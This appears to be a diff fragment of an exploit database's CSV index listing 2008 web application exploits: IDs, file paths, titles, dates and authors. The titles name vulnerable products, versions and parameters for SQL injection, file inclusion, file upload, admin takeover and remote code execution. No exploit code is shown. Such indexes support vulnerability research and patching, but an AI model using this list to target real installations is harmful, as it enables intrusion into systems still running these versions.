+6136,exploits/php/webapps/6136.txt,"PHPwebnews 0.2 MySQL Edition - 'SQL' Insecure Cookie Handling",2008-07-26,"Virangar Security",webapps,php, +6137,exploits/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking",2008-07-26,girex,webapps,php, +6138,exploits/php/webapps/6138.txt,"Mobius 1.4.4.1 - SQL Injection",2008-07-26,dun,webapps,php, +6139,exploits/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' SQL Injection",2008-07-26,mikeX,webapps,php, +6140,exploits/php/webapps/6140.txt,"phpLinkat 0.1 - Insecure Cookie Handling / SQL Injection",2008-07-26,Encrypt3d.M!nd,webapps,php, +6141,exploits/php/webapps/6141.txt,"TriO 2.1 - 'browse.php' SQL Injection",2008-07-26,dun,webapps,php, +6142,exploits/php/webapps/6142.txt,"CMScout 2.05 - 'bit' Local File Inclusion",2008-07-27,"Khashayar Fereidani",webapps,php, +6143,exploits/php/webapps/6143.txt,"Getacoder clone - 'sb_protype' SQL Injection",2008-07-27,"Hussin X",webapps,php, +6144,exploits/php/webapps/6144.txt,"GC Auction Platinum - 'cate_id' SQL Injection",2008-07-27,"Hussin X",webapps,php, +6145,exploits/php/webapps/6145.txt,"SiteAdmin CMS - 'art' SQL Injection",2008-07-27,Cr@zy_King,webapps,php, +6146,exploits/php/webapps/6146.txt,"Pligg CMS 9.9.0 - 'story.php' SQL Injection",2008-07-28,"Hussin X",webapps,php, +6147,exploits/php/webapps/6147.txt,"Youtuber Clone - SQL Injection",2008-07-28,"Hussin X",webapps,php, +6148,exploits/php/webapps/6148.txt,"TalkBack 2.3.5 - 'Language' Local File Inclusion",2008-07-28,NoGe,webapps,php, +6149,exploits/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,webapps,php, +6150,exploits/php/webapps/6150.txt,"PixelPost 1.7.1 - 'language_full' Local File Inclusion",2008-07-28,DSecRG,webapps,php, +6153,exploits/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion",2008-07-28,"Khashayar Fereidani",webapps,php, +6154,exploits/php/webapps/6154.txt,"ViArt Shop 3.5 - 'category_id' SQL Injection",2008-07-28,"GulfTech Security",webapps,php, +6156,exploits/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Local File Inclusion",2008-07-29,DSecRG,webapps,php, +6158,exploits/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 - Blind SQL Injection",2008-07-29,"Virangar Security",webapps,php, +6159,exploits/php/webapps/6159.txt,"Gregarius 0.5.4 - SQL Injection",2008-07-29,"GulfTech Security",webapps,php, +6160,exploits/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - Remote File Inclusion",2008-07-29,RoMaNcYxHaCkEr,webapps,php, +6161,exploits/php/webapps/6161.txt,"HIOX Random Ad 1.3 - Remote File Inclusion",2008-07-30,"Ghost Hacker",webapps,php, +6162,exploits/php/webapps/6162.txt,"HIOX Browser Statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",webapps,php, +6163,exploits/php/webapps/6163.txt,"PHP Hosting Directory 2.0 - Insecure Cookie Handling",2008-07-30,Stack,webapps,php, +6164,exploits/php/webapps/6164.txt,"nzFotolog 0.4.1 - 'action_file' Local File Inclusion",2008-07-30,"Khashayar Fereidani",webapps,php, +6165,exploits/php/webapps/6165.txt,"ZeeReviews - SQL Injection",2008-07-30,Mr.SQL,webapps,php, +6166,exploits/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin",2008-07-30,Stack,webapps,php, +6167,exploits/php/webapps/6167.txt,"Article Friendly Pro/Standard - SQL Injection",2008-07-30,Mr.SQL,webapps,php, +6168,exploits/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin",2008-07-30,Stack,webapps,php, +6169,exploits/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' SQL Injection",2008-07-30,"Hussin X",webapps,php, +6170,exploits/php/webapps/6170.txt,"TubeGuru Video Sharing Script - 'UID' SQL Injection",2008-07-30,"Hussin X",webapps,php, +6171,exploits/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) - SQL Injection",2008-07-30,Jack,webapps,php, +6172,exploits/php/webapps/6172.pl,"Pligg CMS 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",webapps,php, +6173,exploits/php/webapps/6173.txt,"Pligg CMS 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",webapps,php, +6176,exploits/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Authentication Bypass",2008-07-31,gnix,webapps,php, +6177,exploits/php/webapps/6177.php,"Symphony 1.7.01 (non-patched) - Remote Code Execution",2008-07-31,Raz0r,webapps,php, +6178,exploits/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,webapps,php, +6179,exploits/php/webapps/6179.txt,"LetterIt 2 - 'Language' Local File Inclusion",2008-07-31,NoGe,webapps,php, +6180,exploits/php/webapps/6180.txt,"phpMyRealty 2.0.0 - 'location' SQL Injection",2008-08-01,CraCkEr,webapps,php, +6182,exploits/php/webapps/6182.txt,"phpAuction GPL Enhanced 2.51 - 'profile.php' SQL Injection",2008-08-01,"Hussin X",webapps,php, +6183,exploits/php/webapps/6183.txt,"ABG Blocking Script 1.0a - 'abg_path' Remote File Inclusion",2008-08-01,Lo$er,webapps,php, +6184,exploits/php/webapps/6184.txt,"E-topbiz Dating 3 PHP Script - 'mail_id' SQL Injection",2008-08-01,Corwin,webapps,php, +6185,exploits/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - 'id' SQL Injection",2008-08-01,Mr.SQL,webapps,php, +6186,exploits/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - 'id' SQL Injection",2008-08-01,Mr.SQL,webapps,php, +6187,exploits/php/webapps/6187.txt,"eStoreAff 0.1 - 'cid' SQL Injection",2008-08-01,Mr.SQL,webapps,php, +6189,exploits/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' SQL Injection",2008-08-01,"Hussin X",webapps,php, +6190,exploits/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,webapps,php, +6191,exploits/php/webapps/6191.txt,"e-vision CMS 2.02 - SQL Injection / Arbitrary File Upload / Information Gathering",2008-08-02,"Khashayar Fereidani",webapps,php, +6192,exploits/php/webapps/6192.txt,"k-links directory - SQL Injection / Cross-Site Scripting",2008-08-02,Corwin,webapps,php, +6193,exploits/php/webapps/6193.txt,"E-Store Kit-1 < 2 PayPal Edition - 'pid' SQL Injection",2008-08-02,Mr.SQL,webapps,php, +6194,exploits/php/webapps/6194.pl,"moziloCMS 1.10.1 - 'download.php' Arbitrary Download File",2008-08-02,Ams,webapps,php, +6199,exploits/php/webapps/6199.pl,"Joomla! Component EZ Store Remote - Blind SQL Injection",2008-08-03,His0k4,webapps,php, +6200,exploits/php/webapps/6200.txt,"syzygyCMS 0.3 - 'index.php' Local File Inclusion",2008-08-03,SirGod,webapps,php, +6203,exploits/php/webapps/6203.txt,"Dayfox Blog 4 - Multiple Local File Inclusions",2008-08-04,"Virangar Security",webapps,php, +6204,exploits/php/webapps/6204.txt,"Plogger 3.0 - SQL Injection",2008-08-05,"GulfTech Security",webapps,php, +6205,exploits/php/webapps/6205.txt,"iges CMS 2.0 - Cross-Site Scripting / SQL Injection",2008-08-05,BugReport.IR,webapps,php, +6206,exploits/php/webapps/6206.txt,"LiteNews 0.1 - Insecure Cookie Handling",2008-08-05,Scary-Boys,webapps,php, +6207,exploits/php/webapps/6207.txt,"LiteNews 0.1 - 'id' SQL Injection",2008-08-05,Stack,webapps,php, +6208,exploits/php/webapps/6208.txt,"Wsn (Multiple Products) - Local File Inclusion / Code Execution",2008-08-06,otmorozok428,webapps,php, +6209,exploits/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution",2008-08-06,PoMdaPiMp,webapps,php, +6210,exploits/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings",2008-08-06,PoMdaPiMp,webapps,php, +6211,exploits/php/webapps/6211.txt,"Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting",2008-08-06,CraCkEr,webapps,php, +6213,exploits/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling",2008-08-06,Scary-Boys,webapps,php, +6214,exploits/php/webapps/6214.php,"Discuz! 6.0.1 - 'searchid' SQL Injection",2008-08-06,james,webapps,php, +6215,exploits/php/webapps/6215.txt,"pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting",2008-08-10,BeyazKurt,webapps,php, +6219,exploits/php/webapps/6219.txt,"e107 < 0.7.11 - Arbitrary Variable Overwriting",2008-08-10,"GulfTech Security",webapps,php, +6221,exploits/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,webapps,php, +6223,exploits/php/webapps/6223.php,"Quicksilver Forums 1.4.1 - SQL Injection",2008-08-10,irk4z,webapps,php, +6224,exploits/php/webapps/6224.txt,"txtSQL 2.2 Final - 'startup.php' Remote File Inclusion",2008-08-10,CraCkEr,webapps,php, +6225,exploits/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 - Insecure Cookie Handling",2008-08-10,"Virangar Security",webapps,php, +6226,exploits/php/webapps/6226.txt,"psipuss 1.0 - Multiple SQL Injections",2008-08-10,"Virangar Security",webapps,php, +6228,exploits/php/webapps/6228.txt,"OpenImpro 1.1 - 'image.php' SQL Injection",2008-08-10,nuclear,webapps,php, +6230,exploits/php/webapps/6230.txt,"ZeeBuddy 2.1 - 'adid' SQL Injection",2008-08-11,"Hussin X",webapps,php, +6231,exploits/php/webapps/6231.txt,"pPIM 1.0 - Upload/Change Password",2008-08-11,Stack,webapps,php, +6232,exploits/php/webapps/6232.txt,"Ovidentia 6.6.5 - 'item' SQL Injection",2008-08-11,"Khashayar Fereidani",webapps,php, +6233,exploits/php/webapps/6233.txt,"BBlog 0.7.6 - 'mod' SQL Injection",2008-08-12,IP-Sh0k,webapps,php, +6234,exploits/php/webapps/6234.txt,"Joomla! 1.5.x - 'Token' Remote Admin Change Password",2008-08-12,d3m0n,webapps,php, +6235,exploits/php/webapps/6235.txt,"gelato CMS 0.95 - 'img' Remote File Disclosure",2008-08-13,JIKO,webapps,php, +6247,exploits/php/webapps/6247.txt,"dotCMS 1.6 - 'id' Local File Inclusion",2008-08-15,Don,webapps,php, +6249,exploits/php/webapps/6249.txt,"Zeeways ZeeJobsite 2.0 - 'adid' SQL Injection",2008-08-15,"Hussin X",webapps,php, +6250,exploits/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,"Khashayar Fereidani",webapps,php, +6254,exploits/php/webapps/6254.txt,"XNova 0.8 sp1 - 'xnova_root_path' Remote File Inclusion",2008-08-17,NuclearHaxor,webapps,php, +6255,exploits/php/webapps/6255.txt,"phpArcadeScript 4 - 'cat' SQL Injection",2008-08-17,"Hussin X",webapps,php, +6258,exploits/php/webapps/6258.txt,"PHPBasket - 'pro_id' SQL Injection",2008-08-17,r45c4l,webapps,php, +6259,exploits/php/webapps/6259.txt,"VidiScript (Avatar) - Arbitrary File Upload",2008-08-18,InjEctOr5,webapps,php, +6260,exploits/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,webapps,php, +6261,exploits/php/webapps/6261.txt,"PHP live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",webapps,php, +6269,exploits/cgi/webapps/6269.txt,"TWiki 4.2.0 - 'configure' Remote File Disclosure",2008-08-19,Th1nk3r,webapps,cgi, +6270,exploits/php/webapps/6270.txt,"Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",webapps,php, +6271,exploits/php/webapps/6271.txt,"Ad Board - 'id' SQL Injection",2008-08-19,"Hussin X",webapps,php, +6273,exploits/php/webapps/6273.txt,"SunShop Shopping Cart 4.1.4 - 'id' SQL Injection",2008-08-19,"GulfTech Security",webapps,php, +6276,exploits/php/webapps/6276.txt,"Banner Management Script - 'id' SQL Injection",2008-08-19,S.W.A.T.,webapps,php, +6277,exploits/php/webapps/6277.txt,"Active PHP BookMarks 1.1.02 - SQL Injection",2008-08-19,"Hussin X",webapps,php, +6279,exploits/php/webapps/6279.pl,"Pars4U Videosharing 1.0 - Cross-Site Scripting / Blind SQL Injection",2008-08-20,Mr.SQL,webapps,php, +6280,exploits/php/webapps/6280.txt,"phpBazar 2.0.2 - 'adid' SQL Injection",2008-08-20,e.wiZz!,webapps,php, +6281,exploits/php/webapps/6281.pl,"webEdition CMS - 'we_objectID' Blind SQL Injection",2008-08-20,Lidloses_Auge,webapps,php, +6284,exploits/php/webapps/6284.txt,"CustomCMS 4.0 - 'print.php' SQL Injection",2008-08-21,~!Dok_tOR!~,webapps,php, +6285,exploits/php/webapps/6285.txt,"Photocart 3.9 - Multiple SQL Injections",2008-08-21,~!Dok_tOR!~,webapps,php, +6286,exploits/php/webapps/6286.txt,"BandSite CMS 1.1.4 - Download Backup / Cross-Site Scripting / Cross-Site Request Forgery",2008-08-21,SirGod,webapps,php, +6287,exploits/php/webapps/6287.txt,"TinyCMS 1.1.2 - 'templater.php' Local File Inclusion",2008-08-21,cOndemned,webapps,php, +6288,exploits/php/webapps/6288.txt,"easysite 2.3 - Multiple Vulnerabilities",2008-08-21,SirGod,webapps,php, +6291,exploits/php/webapps/6291.txt,"noname script 1.1 - Multiple Vulnerabilities",2008-08-23,SirGod,webapps,php, +6292,exploits/php/webapps/6292.txt,"onenews Beta 2 - Cross-Site Scripting / HTML Injection / SQL Injection",2008-08-23,suN8Hclf,webapps,php, +6294,exploits/php/webapps/6294.txt,"5 star review - Cross-Site Scripting / SQL Injection",2008-08-24,Mr.SQL,webapps,php, +6295,exploits/php/webapps/6295.txt,"MiaCMS 4.6.5 - Multiple SQL Injections",2008-08-24,~!Dok_tOR!~,webapps,php, +6296,exploits/php/webapps/6296.txt,"BtiTracker 1.4.7 / xbtit 2.0.542 - SQL Injection",2008-08-25,InATeam,webapps,php, +6297,exploits/php/webapps/6297.txt,"Matterdaddy Market 1.1 - 'index.php' Multiple SQL Injections",2008-08-25,~!Dok_tOR!~,webapps,php, +6298,exploits/php/webapps/6298.txt,"Web Directory Script 2.0 - 'name' SQL Injection",2008-08-25,~!Dok_tOR!~,webapps,php, +6300,exploits/php/webapps/6300.txt,"Pluck CMS 4.5.2 - Multiple Local File Inclusions",2008-08-25,DSecRG,webapps,php, +6301,exploits/php/webapps/6301.txt,"EZContents CMS 2.0.3 - Multiple Local File Inclusions",2008-08-25,DSecRG,webapps,php, +6303,exploits/php/webapps/6303.txt,"WebBoard 2.0 - Arbitrary SQL Question/Anwser Delete",2008-08-25,t0pP8uZz,webapps,php, +6306,exploits/php/webapps/6306.pl,"GeekLog 1.5.0 - Arbitrary File Upload",2008-08-25,t0pP8uZz,webapps,php, +6307,exploits/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - 'department' SQL Injection",2008-08-25,"GulfTech Security",webapps,php, +6309,exploits/php/webapps/6309.txt,"z-breaknews 2.0 - 'single.php' SQL Injection",2008-08-26,cOndemned,webapps,php, +6310,exploits/php/webapps/6310.txt,"Kolifa.net Download Script 1.2 - 'id' SQL Injection",2008-08-26,Kacak,webapps,php, +6311,exploits/php/webapps/6311.php,"Simple PHP Blog (SPHPBlog) 0.5.1 - Code Execution",2008-08-26,mAXzA,webapps,php, +6312,exploits/php/webapps/6312.txt,"k-rate - SQL Injection / Cross-Site Scripting",2008-08-26,Corwin,webapps,php, +6313,exploits/php/webapps/6313.txt,"CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory",2008-08-26,SirGod,webapps,php, +6314,exploits/php/webapps/6314.txt,"Thickbox Gallery 2.0 - 'Admins.php' Admin Data Disclosure",2008-08-26,SirGod,webapps,php, +6315,exploits/php/webapps/6315.txt,"iFdate 2.0.3 - SQL Injection",2008-08-26,~!Dok_tOR!~,webapps,php, +6316,exploits/php/webapps/6316.php,"MyBulletinBoard (MyBB) 1.2.11 - 'private.php' SQL Injection (2)",2008-08-26,c411k,webapps,php, +6320,exploits/php/webapps/6320.txt,"PHPMyRealty 1.0.9 - Multiple SQL Injections",2008-08-27,~!Dok_tOR!~,webapps,php, +6321,exploits/php/webapps/6321.txt,"Yourownbux 3.1/3.2 Beta - SQL Injection",2008-08-27,~!Dok_tOR!~,webapps,php, +6325,exploits/php/webapps/6325.php,"Invision Power Board 2.3.5 - Multiple Vulnerabilities (2)",2008-08-29,DarkFig,webapps,php, +6332,exploits/php/webapps/6332.txt,"Brim 2.0.0 - SQL Injection / Cross-Site Scripting",2008-08-30,InjEctOr5,webapps,php, +6335,exploits/php/webapps/6335.txt,"Web Directory Script 1.5.3 - 'site' SQL Injection",2008-08-31,"Hussin X",webapps,php, +6336,exploits/php/webapps/6336.txt,"Words tag script 1.2 - 'word' SQL Injection",2008-08-31,"Hussin X",webapps,php, +6338,exploits/php/webapps/6338.txt,"myPHPNuke < 1.8.8_8rc2 - Cross-Site Scripting / SQL Injection",2008-08-31,MustLive,webapps,php, +6339,exploits/php/webapps/6339.txt,"webid 0.5.4 - Multiple Vulnerabilities",2008-08-31,InjEctOr5,webapps,php, +6341,exploits/php/webapps/6341.txt,"WeBid 0.5.4 - 'item.php' SQL Injection",2008-09-01,Stack,webapps,php, +6342,exploits/php/webapps/6342.txt,"EasyClassifields 3.0 - 'go' SQL Injection",2008-09-01,e.wiZz!,webapps,php, +6343,exploits/php/webapps/6343.txt,"CMSbright - 'id_rub_page' SQL Injection",2008-09-01,"BorN To K!LL",webapps,php, +6344,exploits/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload",2008-09-01,Stack,webapps,php, +6346,exploits/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection",2008-09-01,"Virangar Security",webapps,php, +6347,exploits/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - 'artid' SQL Injection",2008-09-02,MustLive,webapps,php, +6348,exploits/php/webapps/6348.txt,"Coupon Script 4.0 - 'id' SQL Injection",2008-09-02,"Hussin X",webapps,php, +6349,exploits/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 - 'site' SQL Injection",2008-09-02,"Hussin X",webapps,php, +6350,exploits/php/webapps/6350.txt,"AJ HYIP ACME - 'comment.php' SQL Injection",2008-09-02,"security fears team",webapps,php, +6351,exploits/php/webapps/6351.txt,"AJ HYIP ACME - 'readarticle.php' SQL Injection",2008-09-02,InjEctOr5,webapps,php, +6352,exploits/php/webapps/6352.txt,"CS-Cart 1.3.5 - Authentication Bypass",2008-09-02,"GulfTech Security",webapps,php, +6354,exploits/php/webapps/6354.txt,"Spice Classifieds - 'cat_path' SQL Injection",2008-09-03,InjEctOr5,webapps,php, +6356,exploits/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution",2008-09-03,zurlich.lpt,webapps,php, +6357,exploits/php/webapps/6357.txt,"aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting",2008-09-03,Alemin_Krali,webapps,php, +6360,exploits/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,webapps,php, +6361,exploits/php/webapps/6361.txt,"Living Local Website - 'listtest.php' SQL Injection",2008-09-03,"Hussin X",webapps,php, +6362,exploits/php/webapps/6362.txt,"ACG-PTP 1.0.6 - 'adid' SQL Injection",2008-09-04,"Hussin X",webapps,php, +6363,exploits/php/webapps/6363.txt,"qwicsite pro - SQL Injection / Cross-Site Scripting",2008-09-04,Cr@zy_King,webapps,php, +6364,exploits/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",webapps,php, +6368,exploits/php/webapps/6368.php,"AWStats Totals 1.14 - 'AWStatstotals.php' Remote Code Execution",2008-09-05,"Ricardo Almeida",webapps,php, +6369,exploits/php/webapps/6369.py,"Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",webapps,php, +6370,exploits/php/webapps/6370.pl,"WebCMS Portal Edition - 'id' Blind SQL Injection",2008-09-05,JosS,webapps,php, +6371,exploits/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - 'ann_id' SQL Injection",2008-09-05,"DeViL iRaQ",webapps,php, +6373,exploits/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - 'news_id' SQL Injection",2008-09-05,"DeViL iRaQ",webapps,php, +6374,exploits/php/webapps/6374.txt,"Vastal I-Tech Toner Cart - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",webapps,php, +6375,exploits/php/webapps/6375.txt,"Vastal I-Tech Share Zone - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",webapps,php, +6376,exploits/php/webapps/6376.txt,"Vastal I-Tech DVD Zone - 'cat_id' SQL Injection",2008-09-05,"DeViL iRaQ",webapps,php, +6378,exploits/php/webapps/6378.txt,"Vastal I-Tech Jobs Zone - 'news_id' SQL Injection",2008-09-05,Stack,webapps,php, +6379,exploits/php/webapps/6379.txt,"Vastal I-Tech MMORPG Zone - 'game_id' SQL Injection",2008-09-05,Stack,webapps,php, +6380,exploits/php/webapps/6380.txt,"Vastal I-Tech Mag Zone - 'cat_id' SQL Injection",2008-09-05,Stack,webapps,php, +6381,exploits/php/webapps/6381.txt,"Vastal I-Tech Freelance Zone - 'coder_id' SQL Injection",2008-09-05,Stack,webapps,php, +6382,exploits/php/webapps/6382.txt,"Vastal I-Tech Cosmetics Zone - 'cat_id' SQL Injection",2008-09-05,Stack,webapps,php, +6383,exploits/php/webapps/6383.txt,"EsFaq 2.0 - 'idcat' SQL Injection",2008-09-05,SuB-ZeRo,webapps,php, +6385,exploits/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - 'tage' SQL Injection",2008-09-05,e.wiZz!,webapps,php, +6388,exploits/php/webapps/6388.txt,"Vastal I-Tech Dating Zone - 'fage' SQL Injection",2008-09-06,ZoRLu,webapps,php, +6390,exploits/php/webapps/6390.txt,"Integramod 1.4.x - Insecure Directory Download Database",2008-09-06,TheJT,webapps,php, +6392,exploits/php/webapps/6392.php,"Simple Machines Forum (SMF) 1.1.5 (Windows x86) - Admin Reset Password",2008-09-06,Raz0r,webapps,php, +6393,exploits/php/webapps/6393.pl,"MemHT Portal 3.9.0 - Remote Create Shell",2008-09-06,Ams,webapps,php, +6395,exploits/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 - 'ordercode' SQL Injection",2008-09-07,BugReport.IR,webapps,php, +6396,exploits/php/webapps/6396.txt,"Alstrasoft Forum - 'cat' SQL Injection",2008-09-07,r45c4l,webapps,php, +6397,exploits/php/webapps/6397.txt,"WordPress 2.6.1 - SQL Column Truncation",2008-09-07,irk4z,webapps,php, +6398,exploits/php/webapps/6398.txt,"E-Shop Shopping Cart Script - 'search_results.php' SQL Injection",2008-09-07,Mormoroth,webapps,php, +6401,exploits/php/webapps/6401.txt,"Alstrasoft Forum - 'catid' SQL Injection",2008-09-09,r45c4l,webapps,php, +6402,exploits/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injections",2008-09-09,"Khashayar Fereidani",webapps,php, +6403,exploits/php/webapps/6403.txt,"Hot Links SQL-PHP 3 - 'report.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,webapps,php, +6404,exploits/php/webapps/6404.txt,"Live TV Script - 'index.php?mid' SQL Injection",2008-09-09,InjEctOr5,webapps,php, +6405,exploits/asp/webapps/6405.txt,"Creator CMS 5.0 - 'sideid' SQL Injection",2008-09-09,"ThE X-HaCkEr",webapps,asp, +6406,exploits/php/webapps/6406.txt,"Stash 1.0.3 - Insecure Cookie Handling",2008-09-09,Ciph3r,webapps,php, +6408,exploits/php/webapps/6408.txt,"CMS Buzz - 'id' SQL Injection",2008-09-09,"security fears team",webapps,php, +6409,exploits/php/webapps/6409.txt,"AvailScript Article Script - 'articles.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,webapps,php, +6410,exploits/php/webapps/6410.txt,"Kim Websites 1.0 - 'FCKeditor' Arbitrary File Upload",2008-09-09,Ciph3r,webapps,php, +6411,exploits/php/webapps/6411.txt,"AvailScript Photo Album - 'pics.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,webapps,php, +6412,exploits/php/webapps/6412.txt,"AvailScript Classmate Script - 'viewprofile.php' SQL Injection",2008-09-09,Stack,webapps,php, +6413,exploits/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusions",2008-09-10,SirGod,webapps,php, +6416,exploits/php/webapps/6416.txt,"Libera CMS 1.12 - 'cookie' SQL Injection",2008-09-10,StAkeR,webapps,php, +6417,exploits/php/webapps/6417.txt,"AvailScript Jobs Portal Script - 'jid' SQL Injection",2008-09-10,InjEctOr5,webapps,php, +6419,exploits/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,webapps,php, +6420,exploits/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,webapps,asp, +6421,exploits/php/webapps/6421.php,"WordPress 2.6.1 - SQL Column Truncation Admin Takeover",2008-09-10,iso^kpsbr,webapps,php, +6422,exploits/php/webapps/6422.txt,"PHPVID 1.1 - Cross-Site Scripting / SQL Injection",2008-09-10,r45c4l,webapps,php, +6423,exploits/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection",2008-09-10,Cru3l.b0y,webapps,php, +6425,exploits/php/webapps/6425.txt,"PHPWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",webapps,php, +6426,exploits/php/webapps/6426.txt,"Autodealers CMS AutOnline - 'pageid' SQL Injection",2008-09-11,r45c4l,webapps,php, +6427,exploits/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 - 'p' Local File Inclusion",2008-09-11,StAkeR,webapps,php, +6428,exploits/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - Cross-Site Scripting / File Disclosure/Bypass / SQL Injection",2008-09-11,"Khashayar Fereidani",webapps,php, +6430,exploits/php/webapps/6430.txt,"D-iscussion Board 3.01 - 'topic' Local File Inclusion",2008-09-11,SirGod,webapps,php, +6431,exploits/php/webapps/6431.pl,"phsBlog 0.2 - Bypass SQL Injection Filtering",2008-09-11,"Khashayar Fereidani",webapps,php, +6432,exploits/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution",2008-09-11,"Khashayar Fereidani",webapps,php, +6433,exploits/php/webapps/6433.txt,"Autodealers CMS AutOnline - 'id' SQL Injection",2008-09-11,ZoRLu,webapps,php, +6435,exploits/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection",2008-09-11,"Virangar Security",webapps,php, +6436,exploits/php/webapps/6436.txt,"PHPWebGallery 1.3.4 - Blind SQL Injection (1)",2008-09-11,Stack,webapps,php, +6437,exploits/php/webapps/6437.txt,"Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user",2008-09-11,Stack,webapps,php, +6438,exploits/php/webapps/6438.pl,"Yourownbux 4.0 - 'cookie' Authentication Bypass",2008-09-11,Tec-n0x,webapps,php, +6439,exploits/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Arbitrary File Upload",2008-09-12,Stack,webapps,php, +6440,exploits/php/webapps/6440.pl,"PHPWebGallery 1.3.4 - Blind SQL Injection (2)",2008-09-12,ka0x,webapps,php, +6442,exploits/php/webapps/6442.txt,"pForum 1.30 - 'showprofil.php' SQL Injection",2008-09-12,tmh,webapps,php, +6443,exploits/php/webapps/6443.pl,"WebPortal CMS 0.7.4 - 'download.php' SQL Injection",2008-09-12,StAkeR,webapps,php, +6444,exploits/php/webapps/6444.txt,"iBoutique 4.0 - 'cat' SQL Injection",2008-09-12,r45c4l,webapps,php, +6445,exploits/php/webapps/6445.txt,"SkaLinks 1.5 - 'register.php' Arbitrary Add Editor",2008-09-12,mr.al7rbi,webapps,php, +6446,exploits/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - 'cat_id' SQL Injection",2008-09-12,FIREH4CK3R,webapps,php, +6447,exploits/php/webapps/6447.txt,"pNews 2.03 - 'newsid' SQL Injection",2008-09-12,r45c4l,webapps,php, +6448,exploits/php/webapps/6448.txt,"WebPortal CMS 0.7.4 - 'FCKeditor' Arbitrary File Upload",2008-09-12,S.W.A.T.,webapps,php, +6449,exploits/php/webapps/6449.php,"pLink 2.07 - 'linkto.php' Blind SQL Injection",2008-09-13,Stack,webapps,php, +6450,exploits/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete",2008-09-13,ka0x,webapps,php, +6451,exploits/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion / PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,webapps,php, +6452,exploits/php/webapps/6452.txt,"phpsmartcom 0.2 - Local File Inclusion / SQL Injection",2008-09-13,r3dm0v3,webapps,php, +6453,exploits/asp/webapps/6453.txt,"FoT Video scripti 1.1b - 'oyun' SQL Injection",2008-09-13,Crackers_Child,webapps,asp, +6455,exploits/php/webapps/6455.txt,"Linkarity - 'link.php' SQL Injection",2008-09-13,"Egypt Coder",webapps,php, 